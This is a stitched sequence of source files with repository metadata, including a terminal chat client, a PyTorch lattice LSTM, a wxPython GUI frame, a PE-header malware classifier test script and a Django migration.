sugs = list_conversations(driver)
print("welcome!")
print("who would you like to harass today? here are some suggestions: ")
print("\n".join([" - "+x for x in sugs]))
while True:
ret_name = ""
while len(ret_name) == 0:
req_name = ask_for("enter contact's name: (`:q` to quit) <")
if req_name == ":q":
driver.close()
return
ret_name = goto_conversation(driver, req_name)
if len(ret_name) == 0:
print("sorry. you don't have a contact of that name. please try again. ")
print("ok. now you're chatting with someone called \""+render_unicode(no_emoji(ret_name))+"\"")
while True:
get_term_shape()
print("retrieving messages...")
msgs = list_messages(driver)
print("rendering messages...")
print("\n"*TERM_ROWS+print_messages(msgs, my_name=get_username(driver),cols=TERM_COLUMNS))
print("type your message below: (`:ls` to list recent messages, `:up /path/to/file` to upload, `:down` to download all attachments, `:q` to exit chat)")
print("-"*TERM_COLUMNS)
ent = ask_for("to "+color_text("["+render_unicode(no_emoji(ret_name)+"]"),30,47)+" <")
if ent == ":q":
break
elif ent.startswith(":up"):
pth = " ".join(ent.split(" ")[1:])
print(["upload failed! check you file path", "upload success!"][int(upload_file(driver, pth))])
elif ent.startswith(":down"):
download_files(driver)
elif ent != "" and ent != ":ls":
print("sending message...")
send_message(driver,ent)
if __name__ == "__main__":
main()
print("good day.")
|
[
"admin@admins-MacBook-Pro-voice-theatre.local"
] |
admin@admins-MacBook-Pro-voice-theatre.local
|
77bcd921aa4b5c8e9433f39362172a8287c4cba5
|
a845841285321224801e107d23fe72e189121eb3
|
/src_mulan/modules/latticelstm.py
|
7a01fd3ecca31e393b34f9562636a21a44a16819
|
[] |
no_license
|
ylwangy/Lattice4LM
|
22e330db539dfb33ef329d4564c4efe2d5fd71c1
|
7228c52276774569b28efeb956fd6e455c60a7ca
|
refs/heads/master
| 2020-06-19T02:17:18.147252
| 2019-11-07T06:30:47
| 2019-11-07T06:30:47
| 196,529,608
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 10,504
|
py
|
"""Implementation of batch-normalized LSTM."""
import torch
from torch import nn
import torch.autograd as autograd
from torch.autograd import Variable
from torch.nn import functional, init
import numpy as np
class WordLSTMCell(nn.Module):
"""A basic LSTM cell."""
def __init__(self, input_size, hidden_size, use_bias=True):
"""
Most parts are copied from torch.nn.LSTMCell.
"""
super(WordLSTMCell, self).__init__()
self.input_size = input_size
self.hidden_size = hidden_size
self.use_bias = use_bias
self.weight_ih = nn.Parameter(
torch.FloatTensor(input_size, 3 * hidden_size))
self.weight_hh = nn.Parameter(
torch.FloatTensor(hidden_size, 3 * hidden_size))
if use_bias:
self.bias = nn.Parameter(torch.FloatTensor(3 * hidden_size))
else:
self.register_parameter('bias', None)
self.reset_parameters()
def reset_parameters(self):
"""
Initialize parameters following the way proposed in the paper.
"""
init.orthogonal_(self.weight_ih.data)
weight_hh_data = torch.eye(self.hidden_size)
weight_hh_data = weight_hh_data.repeat(1, 3)
self.weight_hh.data.set_(weight_hh_data)
if self.use_bias:
init.constant_(self.bias.data, val=0)
def forward(self, input_, hx):
"""
Args:
input_: A (batch, num_words, input_size) tensor containing the
embeddings of the lexicon words matched at this position.
hx: A tuple (h_0, c_0) with the current character-level hidden
and cell state, where the size of both states is
(batch, hidden_size).
Returns:
c_1: A (batch, num_words, hidden_size) tensor holding one candidate
cell state per matched word.
"""
h_0, c_0 = hx
batch_size = h_0.size(0)
bias_batch = (self.bias.unsqueeze(0).expand(input_.size(0), input_.size(1), *self.bias.size()))
weight_hh_batch = self.weight_hh.expand(batch_size, *self.weight_hh.size())
wh_b = torch.add(bias_batch, torch.bmm(h_0.expand(input_.size(1),*h_0.size()).transpose(1,0), weight_hh_batch))
weight_ih_batch = self.weight_ih.expand(batch_size, *self.weight_ih.size())
wi = torch.bmm(input_, weight_ih_batch)
f, i, g = torch.split(wh_b + wi, self.hidden_size, dim=2)
c_1 = torch.sigmoid(f)*c_0.expand(input_.size(1),*c_0.size()).transpose(1,0) + torch.sigmoid(i)*torch.tanh(g)
return c_1
def __repr__(self):
s = '{name}({input_size}, {hidden_size})'
return s.format(name=self.__class__.__name__, **self.__dict__)
class MultiInputLSTMCell(nn.Module):
"""A basic LSTM cell."""
def __init__(self, input_size, hidden_size, use_bias=True):
"""
Most parts are copied from torch.nn.LSTMCell.
"""
super(MultiInputLSTMCell, self).__init__()
self.input_size = input_size
self.hidden_size = hidden_size
self.use_bias = use_bias
self.weight_ih = nn.Parameter(
torch.FloatTensor(input_size, 3 * hidden_size))
self.weight_hh = nn.Parameter(
torch.FloatTensor(hidden_size, 3 * hidden_size))
self.alpha_weight_ih = nn.Parameter(
torch.FloatTensor(input_size, hidden_size))
self.alpha_weight_hh = nn.Parameter(
torch.FloatTensor(hidden_size, hidden_size))
if use_bias:
self.bias = nn.Parameter(torch.FloatTensor(3 * hidden_size))
self.alpha_bias = nn.Parameter(torch.FloatTensor(hidden_size))
else:
self.register_parameter('bias', None)
self.register_parameter('alpha_bias', None)
self.reset_parameters()
def reset_parameters(self):
"""
Initialize parameters following the way proposed in the paper.
"""
init.orthogonal_(self.weight_ih.data)
init.orthogonal_(self.alpha_weight_ih.data)
weight_hh_data = torch.eye(self.hidden_size)
weight_hh_data = weight_hh_data.repeat(1, 3)
self.weight_hh.data.set_(weight_hh_data)
alpha_weight_hh_data = torch.eye(self.hidden_size)
alpha_weight_hh_data = alpha_weight_hh_data.repeat(1, 1)
self.alpha_weight_hh.data.set_(alpha_weight_hh_data)
# The bias is just set to zero vectors.
if self.use_bias:
init.constant_(self.bias.data, val=0)
init.constant_(self.alpha_bias.data, val=0)
def forward(self, input_, c_input, hx):
"""
Args:
input_: A (batch, input_size) tensor containing the character input
features.
c_input: A list of length batch; element b is a (possibly empty) list of
candidate cell states of shape (hidden_size,) coming from lexicon
words ending at this position.
hx: A tuple (h_0, c_0), which contains the current hidden
and cell state, where the size of both states is
(batch, hidden_size).
Returns:
h_1, c_1: Tensors of shape (batch, hidden_size) containing the next hidden and cell state.
"""
h_0, c_0 = hx
batch_size = h_0.size(0)#5
bias_batch = (self.bias.unsqueeze(0).expand(batch_size, *self.bias.size()))
wh_b = torch.addmm(bias_batch, h_0, self.weight_hh)
wi = torch.mm(input_, self.weight_ih)
i, o, g = torch.split(wh_b + wi, self.hidden_size, dim=1)
i = torch.sigmoid(i)
g = torch.tanh(g)
o = torch.sigmoid(o)
if c_input[0] == []:
f = 1 - i
c_1 = f*c_0 + i*g
h_1 = o * torch.tanh(c_1)
else:
c_num = len(c_input[0])
c_input_var = torch.stack([torch.cat([c_input[i][j].unsqueeze(0) for j in range(len(c_input[i]))], 0) for i in range(batch_size)], 0)
# print(c_input_var)
alpha_mask = torch.ones(c_input_var.size(1),c_input_var.size(0),c_input_var.size(2))
for b in range(c_input_var.size(0)):
for n in range(c_input_var.size(1)):
if torch.equal(c_input_var[b,n,:],torch.zeros_like(c_input_var[b,n,:])):
alpha_mask[n,b,:] *= -1000000
alpha_bias_batch = (self.alpha_bias.unsqueeze(0).expand(batch_size, *self.alpha_bias.size()))
alpha_wi = torch.add(alpha_bias_batch, torch.mm(input_, self.alpha_weight_ih))
alpha_wi = alpha_wi.expand(c_num, *alpha_wi.size())
alpha_weight_hh_batch = (self.alpha_weight_hh.expand(batch_size, *self.alpha_weight_hh.size()))
alpha_wh = torch.bmm(c_input_var, alpha_weight_hh_batch)
alpha = torch.sigmoid(alpha_wi + alpha_wh.transpose(1,0))
alpha = alpha * alpha_mask.cuda()
alpha = torch.exp(torch.cat([i.unsqueeze(0), alpha],0))
alpha_sum = alpha.sum(0)
alpha = torch.div(alpha, alpha_sum)
merge_i_c = torch.cat([g.unsqueeze(0), c_input_var.transpose(1,0)],0)
c_1 = merge_i_c * alpha
c_1 = c_1.sum(0)
h_1 = o * torch.tanh(c_1)
return h_1, c_1
def __repr__(self):
s = '{name}({input_size}, {hidden_size})'
return s.format(name=self.__class__.__name__, **self.__dict__)
class LatticeLSTM(nn.Module):
"""A module that runs multiple steps of LSTM."""
def __init__(self, input_dim, hidden_dim, word_drop, word_alphabet_size, word_emb_dim, gaz_embedder, left2right=True):
super(LatticeLSTM, self).__init__()
skip_direction = "forward" if left2right else "backward"
print("build LatticeLSTM... ", skip_direction, " gaz drop:", word_drop)
self.hidden_dim = hidden_dim
self.word_emb = gaz_embedder
self.word_dropout = nn.Dropout(word_drop)
self.rnn = MultiInputLSTMCell(input_dim, hidden_dim)
self.word_rnn = WordLSTMCell(word_emb_dim, hidden_dim)
self.left2right = left2right
self.rnn = self.rnn.cuda()
self.word_emb = self.word_emb.cuda()
self.word_dropout = self.word_dropout.cuda()
self.word_rnn = self.word_rnn.cuda()
print("build LatticeLSTM End... ")
def forward(self, input_, lattice_input, hidden):
"""
input_: character-level input of shape (seq_len, batch, input_dim).
lattice_input: nested list of shape seq_len x batch x 3; lattice_input[t][b][k]
is the id of the lexicon word matched at position t whose cell state
is fed to position t+k+1 (0 means no matched word of that span).
hidden: tuple (h_0, c_0) containing the initial hidden and cell states.
"""
seq_len = input_.size(0)
batch_size = input_.size(1)
hidden_out = []
memory_out = []
(hx,cx)= hidden
hx = hx.squeeze(0).cuda()
cx = cx.squeeze(0).cuda()
id_list = list(range(seq_len))
input_c_list = init_list_of_objects(seq_len, batch_size)
for t in id_list:
(hx,cx) = self.rnn(input_[t], input_c_list[t], (hx,cx))
hidden_out.append(hx.unsqueeze(0))
memory_out.append(cx.unsqueeze(0))
word_embs = self.word_emb(autograd.Variable(torch.LongTensor(lattice_input[t])))
word_embs = self.word_dropout(word_embs)
ct = self.word_rnn(word_embs, (hx,cx))
for i in range(batch_size):
if t+1 < seq_len:
if lattice_input[t][i][0] == 0:
input_c_list[t+1][i].append(torch.zeros_like(ct[i,0,:]))
else:
input_c_list[t+1][i].append(ct[i,0,:])
if t+2 < seq_len:
if lattice_input[t][i][1] == 0:
input_c_list[t+2][i].append(torch.zeros_like(ct[i,1,:]))
else:
input_c_list[t+2][i].append(ct[i,1,:])
if t+3 < seq_len:
if lattice_input[t][i][2] == 0:
input_c_list[t+3][i].append(torch.zeros_like(ct[i,2,:]))
else:
input_c_list[t+3][i].append(ct[i,2,:])
output_hidden, output_memory = torch.cat(hidden_out, 0), torch.cat(memory_out, 0)
return output_hidden, (output_hidden[-1,:,:], output_memory[-1,:,:])
def init_list_of_objects(size, bsz):
list_of_objects = list()
for i in range(0,size):
list_of_objects.append( [list() for i in range(bsz)] )
return list_of_objects
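# ---------------------------------------------------------------------------
# Minimal usage sketch of the two cells (illustrative only; the sizes below are
# assumptions, not values taken from the original training setup):
#
#   char_cell = MultiInputLSTMCell(input_size=50, hidden_size=100)
#   word_cell = WordLSTMCell(input_size=50, hidden_size=100)
#   x = torch.randn(2, 50)                                # one character step, batch of 2
#   hx = (torch.zeros(2, 100), torch.zeros(2, 100))
#   h1, c1 = char_cell(x, [[], []], hx)                   # no matched lexicon words here
#   word_c = word_cell(torch.randn(2, 3, 50), (h1, c1))   # candidate cells: (2, 3, 100)
#
# The candidate cell states in word_c are what LatticeLSTM.forward appends to
# input_c_list for the positions where each matched word ends.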
|
[
"yile.wangy@gmail.com"
] |
yile.wangy@gmail.com
|
0ad87734c9f80419af621baefc87786b066dc899
|
f6194828921cc952234253310a8ddd049893914c
|
/views/MainFrame.py.bak
|
873c5b369d0b46621490564a7d7a53bcaabff466
|
[] |
no_license
|
francom77/dress
|
5b3db0457230016a391187aee1df09123dfca69a
|
b315024751fb231b3a0c367eacb5172e89eb046b
|
refs/heads/master
| 2021-01-15T19:44:15.868685
| 2013-05-25T18:33:55
| 2013-05-25T18:33:55
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,220
|
bak
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# generated by wxGlade HG on Thu Mar 14 17:01:31 2013
import wx
# begin wxGlade: extracode
# end wxGlade
class MainFrame(wx.Frame):
def __init__(self, *args, **kwds):
# begin wxGlade: MainFrame.__init__
kwds["style"] = wx.CAPTION|wx.CLOSE_BOX|wx.MINIMIZE_BOX|wx.MAXIMIZE|wx.MAXIMIZE_BOX|wx.SYSTEM_MENU|wx.RESIZE_BORDER|wx.CLIP_CHILDREN
wx.Frame.__init__(self, *args, **kwds)
# Menu Bar
self.frame_1_menubar = wx.MenuBar()
wxglade_tmp_menu = wx.Menu()
self.frame_1_menubar.Append(wxglade_tmp_menu, "Archivo")
wxglade_tmp_menu = wx.Menu()
self.frame_1_menubar.Append(wxglade_tmp_menu, "Editar")
wxglade_tmp_menu = wx.Menu()
self.frame_1_menubar.Append(wxglade_tmp_menu, "Ver")
wxglade_tmp_menu = wx.Menu()
self.frame_1_menubar.Append(wxglade_tmp_menu, "Ayuda")
self.SetMenuBar(self.frame_1_menubar)
# Menu Bar end
self.panel_1 = wx.Panel(self, -1)
self.btn_detalle_prendas = wx.Notebook(self.panel_1, -1, style=0)
self.notebook_1_pane_1 = wx.Panel(self.btn_detalle_prendas, -1)
self.texto_buscar_prendas = wx.TextCtrl(self.notebook_1_pane_1, -1, "Buscar...")
self.radio_btn_1 = wx.RadioButton(self.notebook_1_pane_1, -1, "Codigo", style=wx.RB_GROUP)
self.radio_btn_2 = wx.RadioButton(self.notebook_1_pane_1, -1, "Nombre", style=wx.RB_GROUP)
self.lista_prendas = wx.ListCtrl(self.notebook_1_pane_1, -1, style=wx.LC_REPORT|wx.SUNKEN_BORDER)
self.button_1 = wx.Button(self.notebook_1_pane_1, -1, "&Detalle")
self.btn_eliminar_prendas = wx.Button(self.notebook_1_pane_1, -1, "&Eliminar")
self.btn_nuevo_prendas = wx.Button(self.notebook_1_pane_1, -1, "&Nuevo")
self.button_5 = wx.Button(self.notebook_1_pane_1, -1, "Realizar &Venta")
self.notebook_1_pane_2 = wx.Panel(self.btn_detalle_prendas, -1)
self.texto_buscar_clientes = wx.TextCtrl(self.notebook_1_pane_2, -1, "Buscar...")
self.radio_btn_1_copy = wx.RadioButton(self.notebook_1_pane_2, -1, "DNI", style=wx.RB_GROUP)
self.radio_btn_2_copy = wx.RadioButton(self.notebook_1_pane_2, -1, "Nombre", style=wx.RB_GROUP)
self.lista_clientes = wx.ListCtrl(self.notebook_1_pane_2, -1, style=wx.LC_REPORT|wx.SUNKEN_BORDER)
self.btn_detalle_clientes = wx.Button(self.notebook_1_pane_2, -1, "&Detalle")
self.btn_eliminar_clientes = wx.Button(self.notebook_1_pane_2, -1, "&Eliminar")
self.btn_nuevo_clientes = wx.Button(self.notebook_1_pane_2, -1, "&Nuevo")
self.__set_properties()
self.__do_layout()
# end wxGlade
def __set_properties(self):
# begin wxGlade: MainFrame.__set_properties
self.SetTitle("Dress")
self.SetSize((803, 500))
self.SetFocus()
self.texto_buscar_prendas.SetMinSize((250, 22))
self.button_1.SetDefault()
self.texto_buscar_clientes.SetMinSize((250, 22))
self.btn_detalle_clientes.SetDefault()
# end wxGlade
def __do_layout(self):
# begin wxGlade: MainFrame.__do_layout
sizer_1 = wx.BoxSizer(wx.VERTICAL)
sizer_2 = wx.BoxSizer(wx.VERTICAL)
sizer_3_copy = wx.BoxSizer(wx.VERTICAL)
sizer_6_copy = wx.BoxSizer(wx.HORIZONTAL)
sizer_7_copy = wx.BoxSizer(wx.VERTICAL)
sizer_4_copy = wx.BoxSizer(wx.HORIZONTAL)
sizer_5_copy = wx.BoxSizer(wx.HORIZONTAL)
sizer_3 = wx.BoxSizer(wx.VERTICAL)
sizer_8 = wx.BoxSizer(wx.HORIZONTAL)
sizer_6 = wx.BoxSizer(wx.HORIZONTAL)
sizer_7 = wx.BoxSizer(wx.VERTICAL)
sizer_4 = wx.BoxSizer(wx.HORIZONTAL)
sizer_5 = wx.BoxSizer(wx.HORIZONTAL)
sizer_4.Add(self.texto_buscar_prendas, 0, wx.ALL|wx.ADJUST_MINSIZE, 10)
sizer_5.Add(self.radio_btn_1, 0, wx.RIGHT|wx.EXPAND|wx.ADJUST_MINSIZE, 20)
sizer_5.Add(self.radio_btn_2, 0, wx.ALIGN_CENTER_VERTICAL|wx.ADJUST_MINSIZE, 0)
sizer_4.Add(sizer_5, 1, wx.LEFT|wx.EXPAND, 20)
sizer_3.Add(sizer_4, 0, wx.EXPAND, 0)
sizer_6.Add(self.lista_prendas, 1, wx.LEFT|wx.RIGHT|wx.EXPAND|wx.ALIGN_RIGHT, 10)
sizer_7.Add(self.button_1, 0, wx.ADJUST_MINSIZE, 0)
sizer_7.Add(self.btn_eliminar_prendas, 0, wx.ADJUST_MINSIZE, 0)
sizer_7.Add(self.btn_nuevo_prendas, 0, wx.ADJUST_MINSIZE, 0)
sizer_6.Add(sizer_7, 0, wx.RIGHT, 10)
sizer_3.Add(sizer_6, 1, wx.EXPAND, 0)
sizer_8.Add(self.button_5, 0, wx.ALL|wx.ALIGN_RIGHT|wx.ADJUST_MINSIZE, 10)
sizer_3.Add(sizer_8, 0, wx.ALIGN_RIGHT, 0)
self.notebook_1_pane_1.SetSizer(sizer_3)
sizer_4_copy.Add(self.texto_buscar_clientes, 0, wx.ALL|wx.ADJUST_MINSIZE, 10)
sizer_5_copy.Add(self.radio_btn_1_copy, 0, wx.RIGHT|wx.EXPAND|wx.ALIGN_CENTER_HORIZONTAL|wx.ADJUST_MINSIZE, 20)
sizer_5_copy.Add(self.radio_btn_2_copy, 0, wx.ALIGN_CENTER_VERTICAL|wx.ADJUST_MINSIZE, 0)
sizer_4_copy.Add(sizer_5_copy, 1, wx.LEFT|wx.EXPAND, 20)
sizer_3_copy.Add(sizer_4_copy, 0, wx.EXPAND, 0)
sizer_6_copy.Add(self.lista_clientes, 1, wx.LEFT|wx.RIGHT|wx.BOTTOM|wx.EXPAND|wx.ALIGN_RIGHT, 10)
sizer_7_copy.Add(self.btn_detalle_clientes, 0, wx.ADJUST_MINSIZE, 0)
sizer_7_copy.Add(self.btn_eliminar_clientes, 0, wx.ADJUST_MINSIZE, 0)
sizer_7_copy.Add(self.btn_nuevo_clientes, 0, wx.ADJUST_MINSIZE, 0)
sizer_6_copy.Add(sizer_7_copy, 0, wx.RIGHT, 10)
sizer_3_copy.Add(sizer_6_copy, 1, wx.EXPAND, 0)
self.notebook_1_pane_2.SetSizer(sizer_3_copy)
self.btn_detalle_prendas.AddPage(self.notebook_1_pane_1, "Prendas")
self.btn_detalle_prendas.AddPage(self.notebook_1_pane_2, "Clientes")
sizer_2.Add(self.btn_detalle_prendas, 1, wx.EXPAND, 0)
self.panel_1.SetSizer(sizer_2)
sizer_1.Add(self.panel_1, 1, wx.EXPAND, 0)
self.SetSizer(sizer_1)
self.Layout()
# end wxGlade
# end of class MainFrame
if __name__ == "__main__":
app = wx.PySimpleApp(0)
wx.InitAllImageHandlers()
frame_1 = MainFrame(None, -1, "")
app.SetTopWindow(frame_1)
frame_1.Show()
app.MainLoop()
|
[
"nicolas_maggione_27@hotmail.com"
] |
nicolas_maggione_27@hotmail.com
|
daeeb80b26acf9b019b2a16705f67b2858d3cd88
|
7269d0125a3a4536a3eea8efc6a63784b82b6161
|
/src/test.py
|
6789bf4a2d604efdf3af8fac7149588792315cc0
|
[] |
no_license
|
rrozario/Malware-Detection-
|
119e756f37bc590fd4e3f81b923e171e82a51f23
|
10e86bc560bf0562477ba04cd74cafbb795e6d2e
|
refs/heads/master
| 2022-08-12T04:23:36.668390
| 2020-05-14T23:10:18
| 2020-05-14T23:10:18
| 264,044,635
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 8,305
|
py
|
# -*- coding: utf-8 -*-
"""
Created on Fri Nov 9 16:03:59 2018
@author: Ruchi
"""
# ##### Testing with unseen file
# To test the model on an unseen file, the characteristics of that file must first be extracted.
#
# Python's pefile.PE library is used to build the feature vector, and the already trained ML model is then used to predict the class of the given file.
# In[ ]:
# %load malware_test.py
"""
this file extracts the required information of a given file using the library PE
"""
import pefile
import os
import array
import math
import pickle
from sklearn.externals import joblib
import sys
import argparse
def get_entropy(data):
if len(data) == 0:
return 0.0
occurences = array.array('L', [0]*256)
for x in data:
occurences[x if isinstance(x, int) else ord(x)] += 1
entropy = 0
for x in occurences:
if x:
p_x = float(x) / len(data)
entropy -= p_x*math.log(p_x, 2)
return entropy
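# get_entropy computes the Shannon entropy H = -sum(p_x * log2(p_x)) over the
# byte-value distribution of the data: e.g. get_entropy(b"aaaa") is 0.0, while
# data that is uniformly random over all 256 byte values approaches 8.0.
# High-entropy sections are a common indicator of packed or encrypted payloads.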
def get_resources(pe):
"""Extract resources :
[entropy, size]"""
resources = []
if hasattr(pe, 'DIRECTORY_ENTRY_RESOURCE'):
try:
for resource_type in pe.DIRECTORY_ENTRY_RESOURCE.entries:
if hasattr(resource_type, 'directory'):
for resource_id in resource_type.directory.entries:
if hasattr(resource_id, 'directory'):
for resource_lang in resource_id.directory.entries:
data = pe.get_data(resource_lang.data.struct.OffsetToData, resource_lang.data.struct.Size)
size = resource_lang.data.struct.Size
entropy = get_entropy(data)
resources.append([entropy, size])
except Exception as e:
return resources
return resources
def get_version_info(pe):
"""Return version infos"""
res = {}
for fileinfo in pe.FileInfo:
if fileinfo.Key == 'StringFileInfo':
for st in fileinfo.StringTable:
for entry in list(st.entries.items()):
res[entry[0]] = entry[1]
if fileinfo.Key == 'VarFileInfo':
for var in fileinfo.Var:
res[list(var.entry.items())[0][0]] = list(var.entry.items())[0][1]
if hasattr(pe, 'VS_FIXEDFILEINFO'):
res['flags'] = pe.VS_FIXEDFILEINFO.FileFlags
res['os'] = pe.VS_FIXEDFILEINFO.FileOS
res['type'] = pe.VS_FIXEDFILEINFO.FileType
res['file_version'] = pe.VS_FIXEDFILEINFO.FileVersionLS
res['product_version'] = pe.VS_FIXEDFILEINFO.ProductVersionLS
res['signature'] = pe.VS_FIXEDFILEINFO.Signature
res['struct_version'] = pe.VS_FIXEDFILEINFO.StrucVersion
return res
#extract the info for a given file
def extract_infos(fpath):
res = {}
pe = pefile.PE(fpath)
res['Machine'] = pe.FILE_HEADER.Machine
res['SizeOfOptionalHeader'] = pe.FILE_HEADER.SizeOfOptionalHeader
res['Characteristics'] = pe.FILE_HEADER.Characteristics
res['MajorLinkerVersion'] = pe.OPTIONAL_HEADER.MajorLinkerVersion
res['MinorLinkerVersion'] = pe.OPTIONAL_HEADER.MinorLinkerVersion
res['SizeOfCode'] = pe.OPTIONAL_HEADER.SizeOfCode
res['SizeOfInitializedData'] = pe.OPTIONAL_HEADER.SizeOfInitializedData
res['SizeOfUninitializedData'] = pe.OPTIONAL_HEADER.SizeOfUninitializedData
res['AddressOfEntryPoint'] = pe.OPTIONAL_HEADER.AddressOfEntryPoint
res['BaseOfCode'] = pe.OPTIONAL_HEADER.BaseOfCode
try:
res['BaseOfData'] = pe.OPTIONAL_HEADER.BaseOfData
except AttributeError:
res['BaseOfData'] = 0
res['ImageBase'] = pe.OPTIONAL_HEADER.ImageBase
res['SectionAlignment'] = pe.OPTIONAL_HEADER.SectionAlignment
res['FileAlignment'] = pe.OPTIONAL_HEADER.FileAlignment
res['MajorOperatingSystemVersion'] = pe.OPTIONAL_HEADER.MajorOperatingSystemVersion
res['MinorOperatingSystemVersion'] = pe.OPTIONAL_HEADER.MinorOperatingSystemVersion
res['MajorImageVersion'] = pe.OPTIONAL_HEADER.MajorImageVersion
res['MinorImageVersion'] = pe.OPTIONAL_HEADER.MinorImageVersion
res['MajorSubsystemVersion'] = pe.OPTIONAL_HEADER.MajorSubsystemVersion
res['MinorSubsystemVersion'] = pe.OPTIONAL_HEADER.MinorSubsystemVersion
res['SizeOfImage'] = pe.OPTIONAL_HEADER.SizeOfImage
res['SizeOfHeaders'] = pe.OPTIONAL_HEADER.SizeOfHeaders
res['CheckSum'] = pe.OPTIONAL_HEADER.CheckSum
res['Subsystem'] = pe.OPTIONAL_HEADER.Subsystem
res['DllCharacteristics'] = pe.OPTIONAL_HEADER.DllCharacteristics
res['SizeOfStackReserve'] = pe.OPTIONAL_HEADER.SizeOfStackReserve
res['SizeOfStackCommit'] = pe.OPTIONAL_HEADER.SizeOfStackCommit
res['SizeOfHeapReserve'] = pe.OPTIONAL_HEADER.SizeOfHeapReserve
res['SizeOfHeapCommit'] = pe.OPTIONAL_HEADER.SizeOfHeapCommit
res['LoaderFlags'] = pe.OPTIONAL_HEADER.LoaderFlags
res['NumberOfRvaAndSizes'] = pe.OPTIONAL_HEADER.NumberOfRvaAndSizes
# Sections
res['SectionsNb'] = len(pe.sections)
entropy = [x.get_entropy() for x in pe.sections]
res['SectionsMeanEntropy'] = sum(entropy)/float(len(entropy))
res['SectionsMinEntropy'] = min(entropy)
res['SectionsMaxEntropy'] = max(entropy)
raw_sizes = [x.SizeOfRawData for x in pe.sections]
res['SectionsMeanRawsize'] = sum(raw_sizes)/float(len(raw_sizes))
res['SectionsMinRawsize'] = min(raw_sizes)
res['SectionsMaxRawsize'] = max(raw_sizes)
virtual_sizes = [x.Misc_VirtualSize for x in pe.sections]
res['SectionsMeanVirtualsize'] = sum(virtual_sizes)/float(len(virtual_sizes))
res['SectionsMinVirtualsize'] = min(virtual_sizes)
res['SectionMaxVirtualsize'] = max(virtual_sizes)
#Imports
try:
res['ImportsNbDLL'] = len(pe.DIRECTORY_ENTRY_IMPORT)
imports = sum([x.imports for x in pe.DIRECTORY_ENTRY_IMPORT], [])
res['ImportsNb'] = len(imports)
res['ImportsNbOrdinal'] = len([x for x in imports if x.name is None])
except AttributeError:
res['ImportsNbDLL'] = 0
res['ImportsNb'] = 0
res['ImportsNbOrdinal'] = 0
#Exports
try:
res['ExportNb'] = len(pe.DIRECTORY_ENTRY_EXPORT.symbols)
except AttributeError:
# No export
res['ExportNb'] = 0
#Resources
resources= get_resources(pe)
res['ResourcesNb'] = len(resources)
if len(resources)> 0:
entropy = [x[0] for x in resources]
res['ResourcesMeanEntropy'] = sum(entropy)/float(len(entropy))
res['ResourcesMinEntropy'] = min(entropy)
res['ResourcesMaxEntropy'] = max(entropy)
sizes = [x[1] for x in resources]
res['ResourcesMeanSize'] = sum(sizes)/float(len(sizes))
res['ResourcesMinSize'] = min(sizes)
res['ResourcesMaxSize'] = max(sizes)
else:
res['ResourcesNb'] = 0
res['ResourcesMeanEntropy'] = 0
res['ResourcesMinEntropy'] = 0
res['ResourcesMaxEntropy'] = 0
res['ResourcesMeanSize'] = 0
res['ResourcesMinSize'] = 0
res['ResourcesMaxSize'] = 0
# Load configuration size
try:
res['LoadConfigurationSize'] = pe.DIRECTORY_ENTRY_LOAD_CONFIG.struct.Size
except AttributeError:
res['LoadConfigurationSize'] = 0
# Version information size
try:
version_infos = get_version_info(pe)
res['VersionInformationSize'] = len(list(version_infos.keys()))
except AttributeError:
res['VersionInformationSize'] = 0
return res
if __name__ == '__main__':
clf = joblib.load('classifier/classifier.pkl')
features = pickle.loads(open(os.path.join('classifier/features.pkl'),'rb').read())
data = extract_infos("C:/Python27/python.exe")
pe_features = [data[x] for x in features]
res= clf.predict([pe_features])[0]
print(('The file %s is %s' % (os.path.basename("C:/Python27/python.exe"),['malicious', 'legitimate'][res])))
|
[
"noreply@github.com"
] |
rrozario.noreply@github.com
|
0937f7fd917adfe8973d1222e184e43f56b68640
|
c52e34a8f7b43028196fe3b385768d7648d06fb9
|
/app01/migrations/0003_answer_option.py
|
960eaa25168aed12b2048f668abae1d4eccf6f10
|
[] |
no_license
|
zhangyi89/questionnarie
|
421e43d3f141508e029dd29f81bc905ab54309fd
|
6386bdff6bb4fb43f2e3b91d90e6fe81c83c4bf4
|
refs/heads/master
| 2021-08-24T10:29:51.542142
| 2017-12-09T06:34:26
| 2017-12-09T06:34:26
| 113,381,596
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 557
|
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.7 on 2017-12-09 04:39
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('app01', '0002_question_questionnaire'),
]
operations = [
migrations.AddField(
model_name='answer',
name='option',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='app01.Option'),
),
]
|
[
"2369717781@qq.com"
] |
2369717781@qq.com
|
3a9ec1f9626739da8e8e1b4449f4770e65322b3e
|
3ab788022d09e10fd7f9751618a82c485441200f
|
/lectures/week03/lect1/ex3-savings.py
|
7a35b0eaacb4819a38a60bf29678765341ceda1b
|
[] |
no_license
|
nkmansou/15-112
|
d46f968b2b7a7d9a00da35f776f3e15b1a89f0f3
|
8917a86fde3f760f6392d959e931a1e59fbd3159
|
refs/heads/master
| 2020-04-15T13:13:41.959579
| 2015-03-10T15:53:24
| 2015-03-10T15:53:24
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 444
|
py
|
# problem: I have 100,000 QAR on a saving account. Every year my bank gives me 2.5% interest on my savings. In addition, the bank offers me a bonus of 5,000 QAR every 5 years. How much will I have in 10 years? 20 years?
# input data
amount = 100000
interest = 2.5
# calculate interests
for i in range(20):
amount = amount * 1.025
if (((i+1) % 5) == 0):
amount = amount + 5000
# display the result
print "Result is: ", amount
|
[
"thierry.sans@gmail.com"
] |
thierry.sans@gmail.com
|
5c395d2a8330c4f6da772620bc61ad55dfe0d85f
|
e138bd85f7737b4793c2c1f10e682eb2106481e0
|
/slicer_wiki_extension_module_listing.py
|
01f6d57cc8818c945ca8c9f2f8bedf958fdfcaf6
|
[
"BSD-3-Clause",
"LicenseRef-scancode-unknown-license-reference",
"LicenseRef-scancode-3dslicer-1.0"
] |
permissive
|
Slicer/slicer-wiki-scripts
|
feef2e05562c1628d507ededd854abc04b44c22a
|
3655eb1cf1fde3995f553a414785bc1c69f6e087
|
refs/heads/master
| 2021-01-01T19:24:03.851023
| 2017-04-18T21:54:43
| 2017-04-18T21:54:43
| 28,377,113
| 0
| 4
